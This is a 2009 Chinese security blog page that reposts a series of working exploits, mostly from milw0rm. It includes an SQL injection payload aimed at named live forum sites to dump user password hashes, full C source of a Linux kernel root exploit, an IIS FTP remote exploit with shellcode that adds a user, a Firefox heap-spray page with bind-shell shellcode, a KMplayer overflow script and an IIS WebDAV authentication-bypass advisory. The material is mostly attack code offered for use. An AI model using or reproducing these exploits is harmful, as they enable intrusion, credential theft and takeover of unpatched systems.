Chinadu's Blog

=========================================================
Discuz! Plugin JiangHu < = 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th 2009

========================[Soft Info]======================

Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor : http://www.discuz.com
d0rk : inurl:forummission.php

[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

/---------------------------------------------www.zhaohuan.net-------------------------------------------------\

Greetz : Snda Security Team
& Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt
阅读全文...

漏洞利用程序：

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by
.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = < $sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = < $sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = < $sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = < $sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(< $new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

# milw0rm.com [2009-08-31]

============================================================
Discuz! Plugin Crazy Star < = 2.0 Sql injection Vulnerability
============================================================

========================[Author]============================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : August, 26th 2009 [Double Seventh Festival]

========================[Soft Info]=========================

Software: Discuz! Plugin Crazy Star(family)
Version : 2.0
Vendor : http://www.discuz.com
阅读全文...

Freebsd localroot的神话被打破了:
阅读全文...

============================================================
Wordpress Plugin WP-Syntax < = 0.9.1 Remote Command Execution
============================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

WP-Syntax - This is the most popular plugin for wordpress to highlight the code. It is used on many sites, such as Stefan Esser uses it on his blog. For me this plugin is of interest, as found in his blog quite a large farm-partnerki. Following an analysis of source code, I found quite unusual vulnerability, therefore, decided to create a separate topic. Probably somebody have comments or thoughts about a more elegant solution.

WP-Syntax uses the library GeSHi, which implements all the functionality to review the syntax and appropriate for each language html-code. Having reviewed the main script plugin wp-syntax.php, I moved to the folder test, where the 2 scripts: index.php and code.php. Code.php contains code examples for different languages, and leads them to the index.php illumination to demonstrate the capacity of the plug-in. Index.php inkludit wp-syntax.php, which in turn connects geshi.php. According to the developer wp-syntax.php can be called only in the context of WP, while the test / index.php can be run independently of the platform, the author decided to use samopalnoe WP likeness of a mechanism to implement the callback-function. Who is familiar with the internal device, WP, or at least see part of the code can understand what I am talking about functions add_action (), do_action (), apply_filters (), etc.
阅读全文...

# milw0rm.com [2009-07-30]

Microsoft Corporation - http:www.microsoft.com/

Affected Software:
Windows XP Service Pack 2
Windows XP Service Pack 3

Affected Driver:
Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796

Local Privilege Escalation Exploit
For Educational Purposes Only !

NT Internals - http:www.ntinternals.org/
alex ntinternals org
30 July 2009

References:
Exploiting Common Flaws in Drivers
Ruben Santamarta - http:www.reversemode.com/

Exploit:
http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip
back: http://milw0rm.com/sploits/2009-NtUserConsoleControl_Exp.zip

Description:
http://www.ntinternals.org/index.html#09_07_30

#!usr/bin/perl
######################## In The Name Of Allah ####################
#
# The KMplayer (.Srt) File Local Bof Poc
#
#
#Author : b3hz4d (Seyed Behzad Shaghasemi)
#Site : Www.Pentesters.Ir
#Tested on KMplayer <= 2.9.4.1433
#Special Thanks : Navid, Hossein, Hooshang, Mahmood, Mohammad and all members in Pentesters.ir
#Greetings : Shahriyar && Alireza && Soroush and all iranian hackers
#
######################### Www.Pentesters.Ir ######################

$junk="A"x 90000;
open(fhandle,">SubTitle.srt");
print fhandle "1"."\n"."00:00:25,100 --> 00:00:30,900"."\n"."$junk\n"."-pentesters\n";
print fhandle "2"."\n"."00:00:31,100 --> 00:00:35,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "3"."\n"."00:00:36,100 --> 00:00:40,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "4"."\n"."00:00:41,100 --> 00:00:45,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "5"."\n"."00:00:46,100 --> 00:00:50,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
print fhandle "6"."\n"."00:00:51,100 --> 00:00:55,900"."\n"."www.pentesters.ir\n"."-Pentesters.Ir\n";
close(fhandle);

# milw0rm.com [2009-07-20]

##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Bryne
# Coded in Perl by netsoul, ALTO PARANA - Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################

#!/usr/bin/perl -w
use strict;
use POE::Component::Server::HTTP;
POE::Component::Server::HTTP->new(Port => my $port = 8080,
ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type", "text/html"), $_[1]->content(<DATA>)}});

print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n";
POE::Kernel->run();

__DATA__
<html>
<head>
<title>Exploiting Firefox 3.5</title>
<script language= javascript>
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" +
"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" +
"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" +
"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" +
"%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
"%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" +
"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" +
"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" +
"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" +
"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" +
"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" +
"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" +
"%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()

function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);$poe_kernel
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}

function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>

# milw0rm.com [2009-07-20]

#
# BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.baofeng.com
#
# Problem DLL    :   config.dll
# Problem Func   :   SetAttributeValue(param1,param2,param3)
# Problem Param  :   param1
#
# References:
#     1. http://forum.eviloctal.com/viewthread.php?tid=35051
#     2. http://www.milw0rm.com/exploits/8579
 

</script>
</body>
</html>


                              ####
                #                            #####
               ####            #             #####
              #######         ###           ######
                #######      ######       #######
                 #########   #######     ########
                 #####################  #########
                  #### #########  ########## ####
                  ####   ######    #######   ####
                  ####     ####      ####    ####
                   ####                #    #####
                   ########    ######       ######


                   ###############################
    # ####          ##############################
    #######      ##             #      ##
     ######     #####      ### ##      ####
      #####    #####       ########    ####      #######       ##
      #####    ####     #  #########   ####     #################
      ####    #####   ####  ########   ####    ##################
    #######  #####    ####  #########  ####   #####         #####
   #################  ####  #### ####  ####  #####    #####
      ##############  ####  #### ##### ##########     #############
      ####      #####  #### ####  #### ##########     ############
      ####       ##### #########  #### ####  #####            ####
      ####        ######### ####   ########   ####            ####
      #####        #############   ########   #####     ###########
      #####         ####### ####    #######    ####################
      ##### #####   ##              #######     ############ #####
      ####  ###########           #     ##       ######         #
            ##############   ##  ##############    #############
           #####    ###### ##### ################# #############
          #####            ######     ############   ####
        ######         # #########    ####    ####  ####
       #####         ########  ####  #####    ####  ###########
      #####          ######     ##################  ###########
     #####            #####      ################# ############
     #######       #########    ###########  ####  ####
        ############### #############  ####      ########
          #############  ##########    ####     ################
            ####          ######       ###       ###############
                           #                            &nb
sp;    ###  

archive: http://milw0rm.com/sploits/2009-IIS-Advisory.pdf

   *** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE ***

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

Discovered by Kingcope - May 12th, 2009

Affected Vendors

      Microsoft

Affected Products

      Web Server

Vulnerability Details

This vulnerability allows remote attackers to bypass access restrictions on vulnerable installations
of Internet Information Server 6.0.
The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly
handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can
result in the following:

         Authentication bypass of password protected folders
         Listing, downloading and uploading of files into a password protected WebDAV folder

Authentication bypass of password protected folders

Assume there is a password protected folder in „d:\inetpub\wwwroot\protected\“. The password
protection mechanism is not relevant for the attack to work. Inside this folder there is a file named
„protected.zip“

The attacker sends a HTTP GET request to the web server.

         GET /  %c0%af/protected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode character is
removed in a WebDAV request. „Translate: f“ instructs the web server to handle the request using
WebDAV. Using this malicious URI construct the webserver sends the file located at
„/protected/protected.zip“ back to the attacker without asking for proper authentication.
Another valid request an attacker might send to the web server is:

         GET /prot%c0%afected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and send back the
password protected file without asking for proper credentials.
ASP scripts cannot be downloaded in this way unless serving of script source-code is enabled.

Listing files in a password protected WebDAV folder

The attack on WebDAV folders is similar. The attacker can bypass the access restrictions of the
password protected folder and list, download, upload and modify files.
The attacker sends a PROPFIND request to the web server.

        PROPFIND /protec%c0%afted/ HTTP/1.1
        Host: servername
        User-Agent: neo/0.12.2
        Connection: TE
        TE: trailers
        Depth: 1
        Content-Length: 288
        Content-Type: application/xml
        <?xml version="1.0" encoding="utf-8"?>
        <propfind xmlns="DAV:"><prop>
        <getcontentlength xmlns="DAV:"/>
        <getlastmodified xmlns="DAV:"/>
        <executable xmlns="http://apache.org/dav/props/"/>
        <resourcetype xmlns="DAV:"/>
        <checked-in xmlns="DAV:"/>
        <checked-out xmlns="DAV:"/>
        </prop></propfind>

IIS responds with the directory listing of the folder without asking for a password.

Credit

This vulnerability was discovered by:
        Nikolaos Rangos
        Contact: kcope2@googlemail.com
        Greetings to: alex and andi